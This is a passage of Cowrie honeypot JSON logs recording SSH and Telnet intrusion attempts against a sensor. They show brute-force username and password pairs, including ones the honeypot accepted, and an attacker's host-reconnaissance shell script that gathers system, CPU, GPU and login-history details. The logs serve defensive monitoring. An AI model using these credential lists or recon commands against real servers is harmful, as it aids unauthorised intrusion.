seconds=$((secondsStr)) && d=$((seconds/86400)) && h=$(( (seconds%86400)/3600 )) && m=$(( (seconds%3600)/60 )) && uptime=\"\" && [ $d -gt 0 ] && uptime=\"${uptime}${d}d\" && [ $h -gt 0 ] && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${h}h\"; } && { [ $m -gt 0 ] || [ -z \"$uptime\" ]; } && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${m}m\"; };; \t\tcpus=$( (nproc || grep -c \"^processor\" /proc/cpuinfo) 2>/dev/null | head -1);; \t\tcpu_model=$( (grep -m1 \"model name\" /proc/cpuinfo | cut -d: -f2 | sed 's/^ //;s/ *$//' || lscpu | grep -m1 \"Model name\" | cut -d: -f2 | sed 's/^ //;s/ *$//') 2>/dev/null);; \t\tgpu_info=$( (lspci | grep -i vga; lspci | grep -i nvidia) 2>/dev/null | head -n5);; \t\tcat_help=$((cat --help 2>&1 | tr '\\n' ' ') || cat --help 2>&1);; \t\tls_help=$((ls --help 2>&1 | tr '\\n' ' ') || ls --help 2>&1);; \t\tlast_output=$((last | tail -n 10) || last);; \t\techo \"UNAME:$uname\";; \t\techo \"ARCH:$arch\";; \t\techo \"UPTIME:$uptime\";; \t\techo \"CPUS:$cpus\";; \t\techo \"CPU_MODEL:$cpu_model\";; \t\techo \"GPU:$gpu_info\";; \t\techo \"CAT_HELP:$cat_help\";; \t\techo \"LS_HELP:$ls_help\";; \t\techo \"LAST:$last_output\";","sensor":"my-vps","timestamp":"2025-08-26T21:23:38.003018Z","src_ip":"212.227.235.229","session":"54c38bc9089c"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -m 2 > /dev/null","message":"CMD: uname -s -v -n -m 2 > /dev/null","sensor":"my-vps","timestamp":"2025-08-26T21:23:38.003767Z","src_ip":"212.227.235.229","session":"54c38bc9089c"}
{"eventid":"cowrie.command.input","input":"uname -m 2 > /dev/null","message":"CMD: uname -m 2 > /dev/null","sensor":"my-vps","timestamp":"2025-08-26T21:23:38.004768Z","src_ip":"212.227.235.229","session":"54c38bc9089c"}
{"eventid":"cowrie.command.input","input":"awk {u=int($1","message":"CMD: awk {u=int($1","sensor":"my-vps","timestamp":"2025-08-26T21:23:38.005815Z","src_ip":"212.227.235.229","session":"54c38bc9089c"}
{"eventid":"cowrie.command.input","input":"cat /proc/uptime | cut -d -f1 | cut -d. -f1","message":"CMD: cat /proc/uptime | cut -d -f1 | cut -d. -f1","sensor":"my-vps","timestamp":"2025-08-26T21:23:38.007308Z","src_ip":"212.227.235.229","session":"54c38bc9089c"}
{"eventid":"cowrie.command.failed","input":"cat /proc/uptime | cut -d -f1 | cut -d. -f1","message":"Command not found: cat /proc/uptime | cut -d -f1 | cut -d. -f1","sensor":"my-vps","timestamp":"2025-08-26T21:23:38.008263Z","src_ip":"212.227.235.229","session":"54c38bc9089c"}
{"eventid":"cowrie.command.input","input":"(secondsStr","message":"CMD: (secondsStr","sensor":"my-vps","timestamp":"2025-08-26T21:23:38.009472Z","src_ip":"212.227.235.229","session":"54c38bc9089c"}
{"eventid":"cowrie.command.input","input":"(seconds/86400","message":"CMD: (seconds/86400","sensor":"my-vps","timestamp":"2025-08-26T21:23:38.009951Z","src_ip":"212.227.235.229","session":"54c38bc9089c"}
{"eventid":"cowrie.command.input","input":"( (seconds%86400","message":"CMD: ( (seconds%86400","sensor":"my-vps","timestamp":"2025-08-26T21:23:38.010596Z","src_ip":"212.227.235.229","session":"54c38bc9089c"}
{"eventid":"cowrie.command.input","input":"(seconds%86400","message":"CMD: (seconds%86400","sensor":"my-vps","timestamp":"2025-08-26T21:23:38.011381Z","src_ip":"212.227.235.229","session":"54c38bc9089c"}
{"eventid":"cowrie.command.input","input":"( (seconds%3600","message":"CMD: ( (seconds%3600","sensor":"my-vps","timestamp":"2025-08-26T21:23:38.012187Z","src_ip":"212.227.235.229","session":"54c38bc9089c"}
{"eventid":"cowrie.command.input","input":"(seconds%3600","message":"CMD: (seconds%3600","sensor":"my-vps","timestamp":"2025-08-26T21:23:38.012811Z","src_ip":"212.227.235.229","session":"54c38bc9089c"}
{"eventid":"cowrie.login.failed","username":"public","password":"public","message":"login attempt [public/public] failed","sensor":"my-vps","timestamp":"2025-08-26T21:23:38.221312Z","src_ip":"212.227.235.229","session":"f7a5b78138c0"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:23:39.483402Z","src_ip":"212.227.235.229","session":"f7a5b78138c0"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","shasum":"1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","destfile":"/dev/null","message":"Saved redir contents with SHA-256 1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057 to var/lib/cowrie/downloads/1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","sensor":"my-vps","timestamp":"2025-08-26T21:23:40.034167Z","src_ip":"212.227.235.229","session":"54c38bc9089c"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c","size":74,"shasum":"ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c","duplicate":true,"duration":"2.0","message":"Closing TTY Log: var/lib/cowrie/tty/ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c after 2.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:23:40.035012Z","src_ip":"212.227.235.229","session":"54c38bc9089c"}
{"eventid":"cowrie.session.closed","duration":"9.3","message":"Connection lost after 9.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:23:40.035923Z","src_ip":"212.227.235.229","session":"54c38bc9089c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":38855,"dst_ip":"1.2.3.4","dst_port":23,"session":"bd784e498070","protocol":"telnet","message":"New connection: 212.227.125.160:38855 (1.2.3.4:23) [session: bd784e498070]","sensor":"my-vps","timestamp":"2025-08-26T21:24:53.073692Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":23516,"dst_ip":"1.2.3.4","dst_port":22,"session":"a758f38f094e","protocol":"ssh","message":"New connection: 212.227.125.160:23516 (1.2.3.4:22) [session: a758f38f094e]","sensor":"my-vps","timestamp":"2025-08-26T21:25:06.215521Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T21:25:06.216888Z","src_ip":"212.227.125.160","session":"a758f38f094e"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T21:25:06.345291Z","src_ip":"212.227.125.160","session":"a758f38f094e"}
{"eventid":"cowrie.login.success","username":"root","password":"!Q2w#E4r%T6y","message":"login attempt [root/!Q2w#E4r%T6y] succeeded","sensor":"my-vps","timestamp":"2025-08-26T21:25:06.877514Z","src_ip":"212.227.125.160","session":"a758f38f094e"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T21:25:07.222305Z","src_ip":"212.227.125.160","session":"a758f38f094e"}
{"eventid":"cowrie.command.input","input":"pwd","message":"CMD: pwd","sensor":"my-vps","timestamp":"2025-08-26T21:25:07.223195Z","src_ip":"212.227.125.160","session":"a758f38f094e"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/a1159e9df3670d549d04524532629f5477ceb7deec9b45e47e8c009506ecb2c8","size":6,"shasum":"a1159e9df3670d549d04524532629f5477ceb7deec9b45e47e8c009506ecb2c8","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/a1159e9df3670d549d04524532629f5477ceb7deec9b45e47e8c009506ecb2c8 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:25:07.353847Z","src_ip":"212.227.125.160","session":"a758f38f094e"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:25:07.355385Z","src_ip":"212.227.125.160","session":"a758f38f094e"}
{"eventid":"cowrie.session.connect","src_ip":"113.231.90.164","src_port":52526,"dst_ip":"1.2.3.4","dst_port":23,"session":"900b4153914f","protocol":"telnet","message":"New connection: 113.231.90.164:52526 (1.2.3.4:23) [session: 900b4153914f]","sensor":"my-vps","timestamp":"2025-08-26T21:25:16.948739Z"}
{"eventid":"cowrie.session.closed","duration":30.47033452987671,"message":"Connection lost after 30 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:25:23.543953Z","src_ip":"212.227.125.160","session":"bd784e498070"}
{"eventid":"cowrie.session.closed","duration":32.77917456626892,"message":"Connection lost after 32 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:25:49.727848Z","src_ip":"113.231.90.164","session":"900b4153914f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":43886,"dst_ip":"1.2.3.4","dst_port":22,"session":"e8d78386163d","protocol":"ssh","message":"New connection: 212.227.235.229:43886 (1.2.3.4:22) [session: e8d78386163d]","sensor":"my-vps","timestamp":"2025-08-26T21:26:24.222753Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T21:26:24.900258Z","src_ip":"212.227.235.229","session":"e8d78386163d"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-26T21:26:24.901209Z","src_ip":"212.227.235.229","session":"e8d78386163d"}
{"eventid":"cowrie.login.failed","username":"admin","password":"admin","message":"login attempt [admin/admin] failed","sensor":"my-vps","timestamp":"2025-08-26T21:26:29.189045Z","src_ip":"212.227.235.229","session":"e8d78386163d"}
{"eventid":"cowrie.session.closed","duration":"7.0","message":"Connection lost after 7.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:26:31.192325Z","src_ip":"212.227.235.229","session":"e8d78386163d"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":54010,"dst_ip":"1.2.3.4","dst_port":22,"session":"30cff5b8e3a4","protocol":"ssh","message":"New connection: 217.72.205.35:54010 (1.2.3.4:22) [session: 30cff5b8e3a4]","sensor":"my-vps","timestamp":"2025-08-26T21:26:40.107720Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:26:40.108846Z","src_ip":"217.72.205.35","session":"30cff5b8e3a4"}
{"eventid":"cowrie.session.connect","src_ip":"45.88.8.215","src_port":45800,"dst_ip":"1.2.3.4","dst_port":22,"session":"cdf128b7177d","protocol":"ssh","message":"New connection: 45.88.8.215:45800 (1.2.3.4:22) [session: cdf128b7177d]","sensor":"my-vps","timestamp":"2025-08-26T21:28:33.180782Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T21:28:33.653005Z","src_ip":"45.88.8.215","session":"cdf128b7177d"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T21:28:33.653666Z","src_ip":"45.88.8.215","session":"cdf128b7177d"}
{"eventid":"cowrie.login.success","username":"root","password":"Nuha@123","message":"login attempt [root/Nuha@123] succeeded","sensor":"my-vps","timestamp":"2025-08-26T21:28:35.358849Z","src_ip":"45.88.8.215","session":"cdf128b7177d"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:28:35.701468Z","src_ip":"45.88.8.215","session":"cdf128b7177d"}
{"eventid":"cowrie.session.connect","src_ip":"123.31.39.100","src_port":43038,"dst_ip":"1.2.3.4","dst_port":23,"session":"f363c7dc4ccd","protocol":"telnet","message":"New connection: 123.31.39.100:43038 (1.2.3.4:23) [session: f363c7dc4ccd]","sensor":"my-vps","timestamp":"2025-08-26T21:28:35.748198Z"}
{"eventid":"cowrie.session.connect","src_ip":"123.31.39.100","src_port":49873,"dst_ip":"1.2.3.4","dst_port":23,"session":"724dd10418ca","protocol":"telnet","message":"New connection: 123.31.39.100:49873 (1.2.3.4:23) [session: 724dd10418ca]","sensor":"my-vps","timestamp":"2025-08-26T21:28:37.827257Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":46444,"dst_ip":"1.2.3.4","dst_port":22,"session":"a0761764c486","protocol":"ssh","message":"New connection: 212.227.125.160:46444 (1.2.3.4:22) [session: a0761764c486]","sensor":"my-vps","timestamp":"2025-08-26T21:28:47.844062Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T21:28:47.845046Z","src_ip":"212.227.125.160","session":"a0761764c486"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-26T21:28:47.894985Z","src_ip":"212.227.125.160","session":"a0761764c486"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":27405,"dst_ip":"1.2.3.4","dst_port":22,"session":"296ef33be91d","protocol":"ssh","message":"New connection: 212.227.235.229:27405 (1.2.3.4:22) [session: 296ef33be91d]","sensor":"my-vps","timestamp":"2025-08-26T21:28:48.126532Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T21:28:48.129676Z","src_ip":"212.227.235.229","session":"296ef33be91d"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T21:28:48.295539Z","src_ip":"212.227.235.229","session":"296ef33be91d"}
{"eventid":"cowrie.login.success","username":"root","password":"!Q2w#E4r%T","message":"login attempt [root/!Q2w#E4r%T] succeeded","sensor":"my-vps","timestamp":"2025-08-26T21:28:48.957103Z","src_ip":"212.227.235.229","session":"296ef33be91d"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T21:28:49.358971Z","src_ip":"212.227.235.229","session":"296ef33be91d"}
{"eventid":"cowrie.command.input","input":"ls -la /","message":"CMD: ls -la /","sensor":"my-vps","timestamp":"2025-08-26T21:28:49.359656Z","src_ip":"212.227.235.229","session":"296ef33be91d"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/352110e27ca54240da15349cfe3b896942c0edeb85990b5868f21c885813869f","size":1347,"shasum":"352110e27ca54240da15349cfe3b896942c0edeb85990b5868f21c885813869f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/352110e27ca54240da15349cfe3b896942c0edeb85990b5868f21c885813869f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:28:49.533411Z","src_ip":"212.227.235.229","session":"296ef33be91d"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:28:49.534920Z","src_ip":"212.227.235.229","session":"296ef33be91d"}
{"eventid":"cowrie.session.closed","duration":"8.0","message":"Connection lost after 8.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:28:55.844651Z","src_ip":"212.227.125.160","session":"a0761764c486"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":34268,"dst_ip":"1.2.3.4","dst_port":22,"session":"c061d1bf5f53","protocol":"ssh","message":"New connection: 212.227.235.229:34268 (1.2.3.4:22) [session: c061d1bf5f53]","sensor":"my-vps","timestamp":"2025-08-26T21:28:59.773595Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T21:29:01.329359Z","src_ip":"212.227.235.229","session":"c061d1bf5f53"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-26T21:29:01.330329Z","src_ip":"212.227.235.229","session":"c061d1bf5f53"}
{"eventid":"cowrie.login.failed","username":"admin","password":"admin1","message":"login attempt [admin/admin1] failed","sensor":"my-vps","timestamp":"2025-08-26T21:29:06.133161Z","src_ip":"212.227.235.229","session":"c061d1bf5f53"}
{"eventid":"cowrie.session.closed","duration":"8.8","message":"Connection lost after 8.8 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:29:08.607263Z","src_ip":"212.227.235.229","session":"c061d1bf5f53"}
{"eventid":"cowrie.session.closed","duration":46.19047236442566,"message":"Connection lost after 46 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:29:21.938607Z","src_ip":"123.31.39.100","session":"f363c7dc4ccd"}
{"eventid":"cowrie.session.closed","duration":46.150527477264404,"message":"Connection lost after 46 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:29:23.977705Z","src_ip":"123.31.39.100","session":"724dd10418ca"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":55506,"dst_ip":"1.2.3.4","dst_port":22,"session":"f8fb0f47151e","protocol":"ssh","message":"New connection: 212.227.235.229:55506 (1.2.3.4:22) [session: f8fb0f47151e]","sensor":"my-vps","timestamp":"2025-08-26T21:31:01.285137Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T21:31:01.859253Z","src_ip":"212.227.235.229","session":"f8fb0f47151e"}
